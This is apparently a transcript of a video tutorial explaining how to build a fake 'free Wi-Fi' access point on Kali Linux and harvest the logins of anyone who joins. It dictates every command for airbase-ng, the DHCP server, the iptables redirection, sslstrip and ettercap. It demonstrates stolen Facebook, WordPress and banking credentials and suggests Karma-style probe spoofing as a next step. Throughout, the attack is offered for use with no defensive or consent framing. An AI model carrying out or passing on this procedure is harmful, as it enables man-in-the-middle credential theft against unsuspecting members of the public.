What's up everyone, this is Chris, and in this tutorial I'm going to teach you how to create a fake access point on a Kali Linux virtual machine. In addition, I'm going to teach you how to use SSL strip and EtherCap to capture the login information of anyone who connects to our fake access point. Now to complete this tutorial, you will need to have a USB network adapter that supports both monitor mode and master mode. If you don't have a USB network adapter that supports these networking modes, the network adapter that I recommend is the Alpha AWUS036NHA. They cost about $30 and you can pick one up from Amazon as well as a few other places. Just Google it and you won't have any problems finding one. Now before we begin the tutorial, I want to explain how this attack works, and I've created some illustrations to help me explain, so let's go ahead and have a look at those. So this is a very high level overview of how this attack works. The main components here include the victim, the attacker, the fake access point, and a router with an internet connection. So what's happening is the attacker is connected to the internet, and the attacker is going to share that internet connection through a USB network adapter, which is acting as a fake access point. And when someone connects to that fake access point, they'll be able to access the internet. Now let me walk you through this process. The first thing that's going to happen is the victim is going to connect to the fake access point. Then the victim's internet traffic will be routed through the fake access point and to the attacker. Once the attacker obtains the victim's internet traffic, the attacker will manipulate and log the victim's internet traffic with SSL strip. And this is going to allow the attacker to force the victim to use HTTP, which as a result is also going to allow the attacker to capture any usernames and passwords that the victim enters. Once SSL strip is finished manipulating and logging the victim's internet traffic, the attacker will forward the victim's internet traffic to the router, and finally, the router will route the victim's internet traffic to whatever website the victim is attempting to communicate with. So what we've done here is we've placed ourselves between the victim and the website. So as a consequence, we can see any interactions that are occurring between the victim and the website. And this is also referred to as a man-in-the-middle attack. So that concludes the explanation. So let's go ahead and get started with the tutorial. The first thing that we need to do is we need to connect to the internet. And we're going to accomplish this by sharing our host operating system's internet connection with our Kali Linux virtual machine. And this is essentially a bridged or a wired network connection. And I've chosen to do it this way so I can eliminate the need for a second USB network adapter. But keep in mind, if you do have a second USB network adapter, you can use it to connect to the internet directly from your Kali Linux virtual machine instead of using the method that I'm going to show you here. So let's go ahead and move over to our host operating system. And you can see that I'm using a Mac with Mac OS X. I want to take this opportunity to point out that your host operating system and computer do not matter. It does not matter what type of computer you are running your Kali Linux virtual machine on, as long as you can use it to connect to the internet. So let's go ahead and open our network settings or whatever network management application your operating system uses. I can access mine from the top menu bar, and then let's find a wireless network to connect to. I'm going to connect to my home network, but keep in mind you can connect to any network that you'd like to as long as it has an internet connection. And if you're mobile, you can tether to your Android or your iPhone's 4G. You can use a 4G USB modem, a mobile hotspot, or whatever means of an internet connection you have. So I'm going to go ahead and connect to my network. And I can see there that I've connected. So now that we've connected to the internet on our host operating system, we need to share it with our Kali Linux virtual machine. So let's go ahead and move over to our Kali Linux virtual machine. And in the top menu bar, we need to open the virtual machine menu. And then we're going to expand the network adapter menu. And if you have multiple network adapters like I do, use the one at the top. It should be called network adapter, and it should not have any numbers following it. And here we need to make sure that we've set our network adapter to use bridged auto detect. And this is going to allow us to obtain an IP address and an internet connection from the router that our host operating system is connected to. So once you've made that setting, you can go ahead and allow the virtual machine menu to collapse. And now we can use that virtual network adapter to establish an internet connection. So let's open up our network manager. And I'm using the WIC-D network manager, but you can use whatever network manager you have. And here you need to find the option that says Wire Network, and then click Connect. And if you're using the default network manager, you should be connected automatically. If not, you may need to reboot your virtual machine and you should be given a connection. If you're still experiencing issues, I recommend installing the Wikti Network Manager, and I have a tutorial that will walk you through the Wikti installation process, so I'll add a link in the description for you in case you need that. So moving on, now that we have an internet connection, we need to find our gateway IP address and make note of it. So let's go ahead and close out our Network Manager, and let's open a terminal. And in the terminal, we need to type route space tac n and then press enter. And go ahead and find your gateway IP address. You can see mine right there. It's 192.168.0.1. And we need to make note of this because we're going to use it in a future command. So let's open a notepad, or if you want, you can use a piece of paper, whatever's convenient for you. And let's just write gateway IP and then enter your gateway IP address. Again, mine is 192.168.0.1. And now that we've made note of our gateway IP address, we need to install DHCP server. So let's move back into the terminal. And in the terminal, we're going to type apt tac get space install space DHCP3 tac server and then press enter. And I've already installed DHCP server, so this will go quickly on my end, but just be patient and allow it enough time to finish. And once the installation is complete, we need to configure our DHCP server. So in the terminal, let's type nano space /etc /dhcpd.conf and then press enter. And you should have a blank DHCPD configuration file like I do. If it isn't blank for some reason, just go ahead and delete all of the contents. And when you're ready, let's start adding our settings. First, we need to type authoritative, semicolon, and then press enter to move down a line. And then type default, tac lease, tac time, space 600, semicolon, and then press enter to move down a line. And type max, tac lease, tac time, space 7200, and then semicolon, and then press enter to move down a line. And then type subnet space 192.168.1.0 space netmask space 255.255.255.0 space forward-facing curly bracket, and then press enter to move down a line. And then type option space routers space 192.168.1.1 semicolon, and then press enter to move down a line. And type option space subnet tac mask space 255.255.255.0 semicolon, press enter to move down a line. And type option space domain tac name space quotation mark, and we're just going to call it free Wi-Fi, all one word. And then quotation mark, semicolon, press enter to move down a line, and type option space domain tac name tac servers space 192.168.1.1 semicolon, and then press enter to move down a line. And type range space 192.168.1.2 space 192.168.1.40 semicolon, and then press enter to move down a line, and then enter a backwards facing curly bracket. And that's everything we need to enter here. So we need to now save the changes that we've made. So let's press the Control and X keys. And then to save the file, we need to press the Y key. And then to write the file and close it, we need to press enter. And now we need to find the name of our USB network adapter. So go ahead and connect your USB network adapter if you haven't already done so. And in the terminal, we need to type airmon tac ng and press enter. And you should see the name of your network adapter listed below interface. I can see mine there. It's called WLAN 0. Yours will probably share a similar format. And now that we know the name of our network adapter, we need to start monitor mode. So let's type airmon tac ng space start space, and then enter the name of your network adapter. Mine is WLAN 0, and then press enter. And we'll give it a moment to create a monitor interface for us. And I can see there that a monitor interface has been created and it's called Mon0. Now we need to create our fake access point. So let's type airbase tac ng space tac c space 11 space tac e space free Wi-Fi space, and then we need to enter the name of our monitor interface. Mine is Mon0, and then press enter. And now that our fake access point is up and running, we need to make some adjustments to our tunnel interface, which is an interface that Airbase automatically created for us when we started our fake access point. So let's open a new terminal, but do not close the terminal that we're running Airbase in because we need it to continue operating. And I'm just going to move this up here. And in the new terminal, we're going to type ifconfig space at0 space 192.168.1.1 space netmask space 255.255.255.0, and then press enter. And now we need to adjust the MTU, which stands for maximum transmission units. And what this does is it allows our tunnel interface to transmit larger packets so that we can prevent packet fragmentation. In simpler terms, this allows our fake access point to manage higher volumes of internet traffic, which is generated by anyone who connects to our fake access point. So in the terminal, let's type ifconfig space at0 space MTU space 1400, and then press enter. And now we need to add a routing table. So let's type route space add space tacnet space 192.168.1.0 space netmask space 255.255.255.0 space GW space 192.168.1.1, and then press enter. And now we need to enable IP forwarding and create some IP tables rules so we can use our tunnel interface to route traffic between our fake access point and our internet source. So we need to type echo space 1 space forward arrow space /proc /sys /net /IPv4 /IP_forward, and then press enter. And now we need to enter our IP tables rules. So let's type IP tables space tac t space nat space tac uppercase A space pre-routing in all uppercase space tac p space UDP space tac j space dnat in all uppercase space tac 2 space, and then we need to enter that gateway IP address that we made note of earlier. Mine is 192.168.0.1, and then press enter. And now we need to type IP tables space tac uppercase P space forward in all uppercase space except in all uppercase, and then press enter. And now we need to type IP tables space tac append space forward in all uppercase space tac in tac interface space at0 space tac j space except in all uppercase, and then press enter. And now we need to type IP tables space tac table space nat space tac append space post routing in all uppercase space tac out tac interface space eth0 space tac j space masquerade in all uppercase, and then press enter. And finally, we need to type IP tables space tac t space nat space tac uppercase A space pre-routing in all uppercase space tac p space TCP space tac destination tac port space 80 space tac j space redirect in all uppercase space tac 2 tac port space 10,000, and then press enter. And now that we've created our IP tables rules, we need to start our DHCP server. So let's type DHCPD space TACCF space /etc /DHCPD.conf space TACPF space /VAR /run DHCPD.PID space AT0, and then press enter. And then type /etc /init.d /ISC TAC DHCP TAC server space start, and then press enter. And I can see there that DHCP server started successfully. So now it's time to start SSL strip. So let's type SSL strip space TACF space TACP space TACK space 10,000, and then press enter. And last but not least, we need to start Ettercap. So let's open a new terminal, but do not close the terminal that we're running SSL strip in. And let me just move this up here a little bit. And in the new terminal, we're going to type Ettercap space TACP space TACU space TAC uppercase T space TACQ space TACI space AT0, and then press enter. And now that we have SSL strip and Ettercap running, we are finished setting up the attack. What I'm going to do now is I'm going to simulate a victim so we can use our fake access point to capture some usernames and passwords. So follow me over to my victim computer. So I'm here at my Mac, which is the computer that I'm going to use to simulate a victim. And as a victim, the first thing I'm going to do is I'm going to connect to the fake access point. So I'm going to open my network manager and I'm going to let it scan nearby wireless networks. And I can see there our fake access point has appeared. And if you remember, we called it free Wi-Fi. I'm going to go ahead and connect to it. And assuming that we set everything up correctly, I should have an internet connection. So I'll just give it a moment to finish connecting. Okay, perfect. It's already connected. I'm just going to check and see if I was assigned an IP address. Perfect. I was assigned 192.168.1.20. So now as a victim, I want to log into my Facebook page. I feel like I'm missing out. I need to see what all my friends are doing. So I'm going to open up Firefox. And as soon as Firefox opens up, I'm going to navigate to Facebook. And we're going to find out right now if SSL strip is working. Okay, and I've been brought to Facebook, and I can tell that I'm using HTTP, which means SSL strip is working. And if you look at the top left there in the tab, you'll notice a lock icon. This is an icon that SSL strip places there to add a little legitimacy, and this kind of prevents the victim from becoming too suspicious because they see this lock and automatically assume it must be secure. So what I'm going to do now is I'm going to go ahead and I'm going to enter an email and a password, and I'm just going to use a fictitious username and password. I'm going to call myself user@facebook.com, and I'm going to call my password mypass123. Now before I click login, let's refer back over to our attacker machine and let's look at the Ettercap terminal. And now I'm going to go ahead and I'm going to click login, and we're going to watch as this data arrives. So I'm going to click login, and you'll notice there that some data has appeared. You can see that the user equals user@facebook.com and the pass equals mypass123. Now before I conclude this tutorial, I want to show you guys a couple more examples. So I'm going to move back over to my victim computer and I'm going to navigate to WordPress. Okay, and I've been brought to WordPress. I'm going to go ahead and enter a username and a password. I'm going to call myself user@wordpress.com. And I'm going to call my password lamepass123. And let's refer back over to our attacker machine. And I'm going to go ahead and click sign in. And if you look at the Ettercap terminal, you'll notice that we did capture that username and password. It shows user equals user@wordpress.com and pass equals lamepass123. Now for the final example, I'm going to go to an online banking website. So let's move back over to my victim computer. And I'm going to navigate to chase.com. Okay, and you can see I've been brought to Chase. I'm going to go ahead and enter a user ID. I'm going to call myself Online Banker, and I'm going to call my password Banking Pass 123. And I'm not going to refer back over to the attacker machine yet because unfortunately this username and password is not going to appear in the EtherCAP terminal, but it will appear in the SSL strip logs. So I'm going to go ahead and click Log into Accounts, and that username and password is traveling across the network. SSL strip is grabbing it and placing it into a log. So let's go ahead and move back over to the attacker computer. And here we need to open a new terminal. And in the new terminal, let's type cat space SSL strip.log and then press enter. And perfect, there it is. I can see the user equals Online Banker and the password equals Banking Pass 123. Now those are all the examples that I wanted to show you, but keep in mind that this attack is expandable. For example, I recommend you guys look at what's called Karma or even a honeypot. And what this does is when a computer is looking for a wireless network to connect to, specifically a wireless network that is connected to in the past, it sends out these probe requests. We can create something that will allow us to accept those probe requests and then spoof the wireless network that that person is looking for. And when it responds, they're going to think they found that wireless network and their computer is going to automatically connect. So there are really a lot of things you can do with this. But for now, it's time to conclude the tutorial. So let's go ahead and clean up this mess. We can go ahead and close the terminal that we used to view the SSL strip log. And then to stop EtherCAP, we'll press the Control and C keys. And then we can close that terminal. And then to stop SSL strip, again, we'll press Control and C, close the terminal. And to stop our fake access point, press Control and C, and then close the terminal. Now, all of those IP tables rules that we created, they will automatically be restored back to the default when you reboot your virtual machine. I'm not going to take the time to show you the commands to do that in the terminal because it's just too time consuming. So until next time, this is Chris, and that was how to create a fake access point on your Kali Linux virtual machine. I hope you enjoyed the tutorial, and please don't forget to like, comment, and subscribe.